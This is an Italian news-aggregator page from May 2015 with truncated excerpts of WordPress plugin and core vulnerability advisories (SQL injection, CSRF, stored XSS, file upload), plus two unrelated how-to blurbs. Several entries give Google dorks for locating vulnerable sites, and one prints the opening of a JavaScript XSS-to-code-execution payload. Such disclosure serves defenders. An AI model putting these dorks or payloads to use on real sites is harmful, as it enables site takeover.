WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE...

Leggi il seguito »

WordPress Freshmail 1.5.8 SQL Injection

15 maggio 2015 - Fonte: http://www.mondounix.com
------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email...

Leggi il seguito »

Come rendere il tuo sito WordPress responsive mobile friendly

14 maggio 2015 - Fonte: http://www.blogghidee.com
Come rendere il tuo sito responsive. Ma cosa significa? In pratica che l’aspetto grafico si adatti alla lettura di tutti i device come cellulari, tablet etc. Inoltre sembra che Google abbia una netta preferenza per tutti i siti e blog responsive per quanto riguarda l’indicizzazione nei motori di ricerca. Come si fa a sapere se [...]...

Leggi il seguito »

Come rimuovere il Malware su Facebook

13 maggio 2015 - Fonte: http://www.tenoreinformatico.it/

Cerchi disperatamente di accedere al tuo account Facebook e quando provi ad eseguire i login ti compare sempre l'avviso: Il tuo Computer potrebbe essere infettato da un malware. Se ti è capitato questo tipo di problema, molto probabilmente ai un malware presente nel tuo Computer, che ti impedisce l'accesso a Facebook. Non preoccuparti, Tenoreinformatico è qui per aiutarti a risolvere...

Leggi il seguito »

WordPress Ad Inserter 1.5.2 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
================================================================
CSRF/Stored XSS Vulnerability in Ad Inserter Plugin 
================================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-inserter/
* Severity: HIGH
* Version Affected: Version  1.5.2  and mostly prior to it
* Version Tested : Version  1.5.2
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
* ad1_name
* Block 1
* Block Name
* adinserter name
* disable adinserter 
 
 
About...

Leggi il seguito »

WordPress Embed-Articles 7.0.3 CSRF / XSS

9 maggio 2015 - Fonte: http://www.mondounix.com
======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of...

Leggi il seguito »

WordPress Akismet 3.1.1 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ ,
https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url']...

Leggi il seguito »

WordPress 4.2.1 XSS / Code Execution

9 maggio 2015 - Fonte: http://www.mondounix.com
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout:...

Leggi il seguito »

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

9 maggio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1....

Leggi il seguito »

WordPress 4.2 Cross Site Scripting

9 maggio 2015 - Fonte: http://www.mondounix.com
*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes...

Leggi il seguito »